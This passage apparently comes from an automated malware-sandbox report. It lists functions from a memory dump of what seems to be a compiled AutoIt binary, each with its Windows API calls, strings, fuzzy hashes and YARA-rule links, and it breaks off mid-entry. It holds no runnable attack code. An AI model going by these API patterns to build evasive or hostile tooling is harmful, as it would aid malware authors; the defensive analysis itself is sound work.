Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 942a85d19ef3bf479983d2f67734a1a485b0b590424594773eccce5e38d91f56
Instruction ID: 8d0e79cf4c4a3d6fbdd3a793f3f31e1ae927cef387267a93c058915f70dd9042
Opcode Fuzzy Hash: 942a85d19ef3bf479983d2f67734a1a485b0b590424594773eccce5e38d91f56
Instruction Fuzzy Hash: 11A13971508205AFD700EF64C885FABB7E8EFD5344F00492CF1569B1A2EB70EA49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A22F86, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 202windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,?), ref: 00A230A6
SetMenuItemInfoW.USER32 ref: 00A23159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A23187

Strings

0, xrefs: 00A23063

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$Default
String ID: 0
API String ID: 1306138088-4108050209
Opcode ID: 475fe44d3b8c2ec866230290ebe398ee741c0b28b3513bf24700a0044d9dd93a
Instruction ID: fad5bd086e2b8f41051edbf8e6a125fea69c4443d5de330480e9dd96cb9f5827
Opcode Fuzzy Hash: 475fe44d3b8c2ec866230290ebe398ee741c0b28b3513bf24700a0044d9dd93a
Instruction Fuzzy Hash: 5751C432508360AEDF159F2CE945A6B77E4EF86360F040A3DF885D2191DB78CE548762

Uniqueness

Uniqueness Score: -1.00%

Function 00A22C42, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A22CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00A22D11
DeleteMenu.USER32(000000FF,00000000,00000000,000000FF,00000000,00000000,00A86890,00000000), ref: 00A22D5A

Strings

0, xrefs: 00A22CA4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: c63747577e537c6e56815b66709fc9274dab64daacab0b7e455cbffd3b6ec1e6
Instruction ID: e39f4096d03975bd7801c9f8e12afca37ef0f76236c34b0e1d59fcbd797c591a
Opcode Fuzzy Hash: c63747577e537c6e56815b66709fc9274dab64daacab0b7e455cbffd3b6ec1e6
Instruction Fuzzy Hash: C941BF75204311BFD720DF28EC44F6ABBA8EF85324F10462EF961972A1D771E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A238AD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A24F89,?), ref: 00A248C7

Part of subcall function 00A248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A24F89,?), ref: 00A248E0

lstrcmpiW.KERNEL32(?,?,?,00000000,?,00A250EE,00000001,?,?), ref: 00A238F3
MoveFileW.KERNEL32(?,?), ref: 00A23927
SHFileOperationW.SHELL32(?), ref: 00A239DB

Strings

\*.*, xrefs: 00A23969

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFullNamePath$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 67141772-1173974218
Opcode ID: a25099bbb881daa87df5feaee0a8181fb3a48fecfb7b9096247b6f802eb1021f
Instruction ID: cdfbc1b358a2ee6a527c266c639de7beead9467b104df2c2c7191044f6559329
Opcode Fuzzy Hash: a25099bbb881daa87df5feaee0a8181fb3a48fecfb7b9096247b6f802eb1021f
Instruction Fuzzy Hash: 894164725083949ECB51EF68D455AEBB7ECEF8A340F10193EF085C3151EA75D688C752

Uniqueness

Uniqueness Score: -1.00%

Function 00A47BB5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A4F910,00000000,?,?,?,?), ref: 00A47C4E
GetWindowLongW.USER32 ref: 00A47C6B
SetWindowLongW.USER32 ref: 00A47C7B

Strings

SysTreeView32, xrefs: 00A47C20

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 4246d39a6c49fd7657a550d75f850d07d63c10bf3081d8e65e0e266bf91d2561
Instruction ID: 228fc6d364f46fd54039e152b4c94e0f44bdcb76fbe190102c9888773cc18566
Opcode Fuzzy Hash: 4246d39a6c49fd7657a550d75f850d07d63c10bf3081d8e65e0e266bf91d2561
Instruction Fuzzy Hash: 7E31CD3A604245AFDB119F74DC85BEB77A8EB89334F204729F875E21E1C731A8519B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A47648, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A476D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A476E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A47708

Strings

SysMonthCal32, xrefs: 00A4769B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: ba90a2e46210de5e8eb21ab31205e1b0077c5c67a105c8a8aece83a147e8c10e
Instruction ID: 5911e2f6f1345aa4b5330daff0bfab6b1b186686942daa84895ff5b8586d9db7
Opcode Fuzzy Hash: ba90a2e46210de5e8eb21ab31205e1b0077c5c67a105c8a8aece83a147e8c10e
Instruction Fuzzy Hash: A521B136600218BFDF11CFA4CC42FEE3B79EB89764F110214FA156B1D0D7B2A8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A47E02, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?), ref: 00A47EB9
SendMessageW.USER32(00000000,00000465,?,80017FFF), ref: 00A47EC7
DestroyWindow.USER32(00000000,00000000,?,?,?,?,msctls_updown32,?,00000000,?,?,?,?,?), ref: 00A47ECE

Strings

msctls_updown32, xrefs: 00A47E33

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 3877243510b7089e547ab6f9f57c8d1cb917786522886956cf8b01a81b998d50
Instruction ID: 4bf14b69646250f55377f8d104c91a89ce44c90af754cadf999949c0403c03f9
Opcode Fuzzy Hash: 3877243510b7089e547ab6f9f57c8d1cb917786522886956cf8b01a81b998d50
Instruction Fuzzy Hash: F32160B9604249AFEB10DF64DC82DBB37EDEB9A394B040959F904972A1CB31EC518B70

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A52F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1A37C: SendMessageTimeoutW.USER32 ref: 00A1A399
Part of subcall function 00A1A37C: GetWindowThreadProcessId.USER32(?,?), ref: 00A1A3AC
Part of subcall function 00A1A37C: GetCurrentThreadId.KERNEL32 ref: 00A1A3B3
Part of subcall function 00A1A37C: AttachThreadInput.USER32(00000000,?,00A1A554,?,00000001,00A4F910,?,00000001), ref: 00A1A3BA

GetFocus.USER32 ref: 00A1A554

Part of subcall function 00A1A3C5: GetParent.USER32(?), ref: 00A1A3D3

GetClassNameW.USER32 ref: 00A1A59D
EnumChildWindows.USER32 ref: 00A1A5C5

Strings

%s%d, xrefs: 00A1A5D9

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
String ID: %s%d
API String ID: 2776554818-1110647743
Opcode ID: fc15ef488ff06749621d02146a191745a7b7ef8e678c62a3ff955f00dcee85c6
Instruction ID: baba04056bb16cf81dccb3c05e19369220dbd2a9b96097183a82058758429ebb
Opcode Fuzzy Hash: fc15ef488ff06749621d02146a191745a7b7ef8e678c62a3ff955f00dcee85c6
Instruction Fuzzy Hash: 8421A2796012087BDF11ABB0ED85FFB777CEF95310F044066F918AA092CA3259858B32

Uniqueness

Uniqueness Score: -1.00%

Function 00A2AEAB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A2AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A2AF13
SetErrorMode.KERNEL32(00000000,00000001,00000000,00A4F910), ref: 00A2AF6A

Strings

%lu, xrefs: 00A2AF26

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 591cfb859cb9180c54d533f99cf792fb552c1b6b4aba274c1bc42f331a6f3fe3
Instruction ID: 2168f8f40584a0f218c08c105a354cd5e117c4c3d1de051149b2a3de09473eba
Opcode Fuzzy Hash: 591cfb859cb9180c54d533f99cf792fb552c1b6b4aba274c1bc42f331a6f3fe3
Instruction Fuzzy Hash: 1B214134A00109AFDB10DF69DD85EAE7BB8EF89704B1040A9F909EB251DB71EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A4797D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405), ref: 00A479E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A479F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A47A03

Strings

msctls_trackbar32, xrefs: 00A479B8

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 8237c77855c94c16b832fd21786f36ef5a8457bfecabc905d50a7781bcf4f1ea
Instruction ID: 63b0c591c3d05a989bf88ee243e65e7d51080ea7a1d438f81675348ae689b6e0
Opcode Fuzzy Hash: 8237c77855c94c16b832fd21786f36ef5a8457bfecabc905d50a7781bcf4f1ea
Instruction Fuzzy Hash: 1511C176254288BEEF149FA0CC05FAF3B69EBC9764F124529F645A60D1D3729811CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009E32AB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,009E32EA,00000000,?,009E9EFE,000000FF,0000001E,00A7BE28,00000008,009E9E62,00000000,?), ref: 009E32BA
GetProcAddress.KERNEL32(?,CorExitProcess), ref: 009E32CC

Strings

mscoree.dll, xrefs: 009E32B3
CorExitProcess, xrefs: 009E32C4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 3c048e2a5453615cb6fecdcee5d913d4c73dcdff4cc2e89420061b352153223d
Instruction ID: bf618848bd2d90545abe2c9c02c7a57eacfe9a761395e5dfc95fbbd00af1ff85
Opcode Fuzzy Hash: 3c048e2a5453615cb6fecdcee5d913d4c73dcdff4cc2e89420061b352153223d
Instruction Fuzzy Hash: E9D01235740108BFDB118B91DC16F693B6CFB42783F404565B914E1450D7739E149660

Uniqueness

Uniqueness Score: -1.00%

Function 009C4C95, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,009C4C2E), ref: 009C4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 009C4CB5

Strings

GetNativeSystemInfo, xrefs: 009C4CAF
kernel32.dll, xrefs: 009C4C9E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 4ffb12d416c9109f73d374a68968f90e71bb203db7d7ecba73ff10cf0fe5332f
Instruction ID: 411590cdd995c648bc307c48c20b104ff5dfadba69f9db9e99f5318ab11f658b
Opcode Fuzzy Hash: 4ffb12d416c9109f73d374a68968f90e71bb203db7d7ecba73ff10cf0fe5332f
Instruction Fuzzy Hash: 22E0C278A00712EECB205F74DE18A827AD4EF42390B10DC3EE4C5C00A0D2309081C620

Uniqueness

Uniqueness Score: -1.00%

Function 009C4D94, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,009C4CE1,?,009FDD1E,?,00A862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009C4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009C4DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 009C4DAE
kernel32.dll, xrefs: 009C4D9D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 6d0089c9fc434b6ec1838502fcf917a46150db54a00608b8a5d5daff6ba017ce
Instruction ID: c43fb9c25b640be834226ca293bf42dfc745c26bc41d31d9a2e1333680b34816
Opcode Fuzzy Hash: 6d0089c9fc434b6ec1838502fcf917a46150db54a00608b8a5d5daff6ba017ce
Instruction Fuzzy Hash: 7EE0C278A00302EECB206F74DC08E867AD4FF06394B00CC3EE4C6C40D0D330A481C620

Uniqueness

Uniqueness Score: -1.00%

Function 009C4D61, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,009C4D2E,?,009C4F4F,?,00A862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009C4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009C4D81

Strings

kernel32.dll, xrefs: 009C4D6A
Wow64DisableWow64FsRedirection, xrefs: 009C4D7B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 0524d5b0e17ca7cc91c4c68fdf355b0ccc5870fb1cb3357ac8100652044df800
Instruction ID: 70c0fe496bea6802e4896297d05a4e119dc3b1b3550d9ce1462c272689a6fa1b
Opcode Fuzzy Hash: 0524d5b0e17ca7cc91c4c68fdf355b0ccc5870fb1cb3357ac8100652044df800
Instruction Fuzzy Hash: 89E08C78A00702DFD720AF65DC08A5676D8BF02391B10C93D9487C1190D231A081CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00A41072, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00A412C1), ref: 00A41080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A41092

Strings

RegDeleteKeyExW, xrefs: 00A4108C
advapi32.dll, xrefs: 00A4107B

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 4c2e30deb72a41a92ea9400676567b2d36b9740b7dc0d0d899476245725e6e6a
Instruction ID: faf75953d2c7b1e9b02aab409de12a47ba5aca099ff652ff624213860897307b
Opcode Fuzzy Hash: 4c2e30deb72a41a92ea9400676567b2d36b9740b7dc0d0d899476245725e6e6a
Instruction Fuzzy Hash: D7D01278520712DFD7209F75DC18A5676E4AF85351F11CD3AA489D6150EB70C8C0C650

Uniqueness

Uniqueness Score: -1.00%

Function 00A393F5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00A39009,?,00A4F910), ref: 00A39403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A39415

Strings

GetModuleHandleExW, xrefs: 00A3940F
kernel32.dll, xrefs: 00A393FE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 4b621aa4331c39412489624529ee2e0140a4944ca89d257325d5ef40cc77b889
Instruction ID: b40a9220bc6f1e76273234616d6de55a9b758f3bc7600ad5de64a93f32aec898
Opcode Fuzzy Hash: 4b621aa4331c39412489624529ee2e0140a4944ca89d257325d5ef40cc77b889
Instruction Fuzzy Hash: 0CD0C738940713EFCB208FB4CA0860772E4AF42382F10CC3AA486C2550E7B0C881CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00A176C5, Relevance: 6.3, APIs: 4, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b99cb03d6a9ba65eec7d5fcf9ed11a50f2f2c6f2bf27f384284dbb3690a7d98b
Instruction ID: 6ef441112d14e4caf2c54b20445950a6c0af7fdcb883477bc74fa6625be7fce2
Opcode Fuzzy Hash: b99cb03d6a9ba65eec7d5fcf9ed11a50f2f2c6f2bf27f384284dbb3690a7d98b
Instruction Fuzzy Hash: C7C17075A04216EFDB14DFA8C988DEEBBB9FF48314B109599E445EB250D730EE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A383A8, Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A383D8
CoUninitialize.OLE32 ref: 00A383E3

Part of subcall function 00A1DA5D: CoCreateInstance.OLE32(00000018,00A52C2C,00000005,00000028,?,?,00000001,?,?,00000000,00000000,00000000,?,00A38639,?,00000000), ref: 00A1DAC5

VariantInit.OLEAUT32(?), ref: 00A383EE
VariantClear.OLEAUT32(?), ref: 00A386BF

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 8b73e5fb32b83980bc5768fcbfe7ee4c3ef3b7902826ceaeb1eceb0982bc1a78
Instruction ID: d4700ff901ef13ba6abfcb8906769b4b0a7c2391ab8d4f9e99932988a53c3b15
Opcode Fuzzy Hash: 8b73e5fb32b83980bc5768fcbfe7ee4c3ef3b7902826ceaeb1eceb0982bc1a78
Instruction Fuzzy Hash: ACA113756047019FDB10DF29C885B2AB7E4BF88714F15885DF99A9B3A2CB34ED44CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A16DF3, Relevance: 6.2, APIs: 4, Instructions: 222memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A16E04
SysAllocString.OLEAUT32(00000000), ref: 00A16EAD
VariantCopy.OLEAUT32 ref: 00A16EDC
VariantClear.OLEAUT32(?), ref: 00A16F03

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: ad9ca8edc12d69c531eebcc4aec641a03332b82210fb84cc3e610e94393996e1
Instruction ID: e89b1cc79a0a43897304c8e54fafc307bc2670c24328873d39b92f3eb5acf1dd
Opcode Fuzzy Hash: ad9ca8edc12d69c531eebcc4aec641a03332b82210fb84cc3e610e94393996e1
Instruction Fuzzy Hash: 4A51A435508302AED730AF65E885FBEB3B8EF49320F20981FF596D6591DA30D8C49B25

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F121, Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A3F151
Process32FirstW.KERNEL32(00000000,?), ref: 00A3F15F
Process32NextW.KERNEL32(00000000,?), ref: 00A3F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00A3F22E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

